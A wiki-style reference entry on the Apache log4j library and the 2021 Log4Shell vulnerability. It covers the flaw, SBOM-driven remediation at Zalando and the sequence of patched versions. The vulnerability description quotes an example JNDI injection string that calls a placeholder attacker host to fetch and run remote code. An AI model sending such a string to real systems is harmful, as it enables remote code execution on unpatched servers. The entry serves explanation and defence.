SYSTEM Cited by 1 source

log4j

log4j is an Apache Software Foundation Java logging library — the industry-standard logging framework for JVM applications for the better part of two decades. It became famous outside the JVM community in December 2021 as the source of Log4Shell (CVE-2021-44228), a trivially-exploitable remote code execution vulnerability that affected log4j-core versions 2.0-beta9 through 2.14.1.

Log4Shell (CVE-2021-44228)

The vulnerability used log4j's JNDI lookup feature: a log message containing ${jndi:ldap://attacker.example/a} would cause log4j to fetch and execute Java classes from the attacker's server. Exploitable via any unvalidated string passed to a log call — including HTTP headers, User-Agent, request paths, form fields. The bug was present in a library transitively linked by tens of thousands of Java applications worldwide.

Released in public on 2021-12-09, Log4Shell triggered one of the largest coordinated software-remediation events in industry history. It is the canonical forcing function for the fleet-wide SBOM-query vulnerability-sweep pattern: orgs that had a fleet-wide dependency corpus could answer "which of our apps contain log4j-core 2.0-2.14?" in seconds; orgs without scrambled through per-repo audits for days or weeks.

Canonical wiki use (Zalando 2023-04-12)

Named as the defining forcing function for Zalando's SBOM-as-data-lake platform:

"Critical vulnerabilities in commonly used libraries (e.g. log4j, spring, commons-text) require an ability to find all affected applications in minutes. Only this way can the impact of a vulnerability be assessed and mitigated quickly. … For large-scale patch actions (like the famous log4j upgrade), we prepare change sets for different types of build files and automate the Pull Request creation across all repositories." (Source: sources/2023-04-12-zalando-how-software-bill-of-materials-change-the-dependency-game)

Patched versions

• 2.15.0 (2021-12-10) — partial fix; still exploitable via non-default configurations.
• 2.16.0 (2021-12-13) — disabled JNDI by default, removed message lookups.
• 2.17.0 (2021-12-18) — fixed additional DoS vector (CVE-2021-45105).
• 2.17.1 (2021-12-28) — fixed JDBC Appender RCE (CVE-2021-44832).

The four-version patch cascade over ~3 weeks is itself a case study in the difference between initial-fix and exhaustively-fixed — orgs that patched once on 2021-12-10 had to re-patch three more times over the following three weeks.

Seen in

• sources/2023-04-12-zalando-how-software-bill-of-materials-change-the-dependency-game — canonical wiki mention. Log4Shell as the forcing function for Zalando's fleet-wide SBOM platform.

Related

• concepts/sbom-software-bill-of-materials — the concept whose importance Log4Shell crystallised industry-wide.
• patterns/vulnerability-fleet-sweep-via-sbom-query — the pattern Log4Shell taught every large org to build.
• patterns/dependency-update-discipline — the tactical layer of keeping dep versions patch-ready.
• concepts/os-library-vulnerability-ungovernable — the broader ungovernable-library class log4j does not belong to (log4j is app-shipped, not OS-provided — but the response-shape has analogues).
• systems/syft · systems/grype — the SBOM tooling that catches presence + CVE match.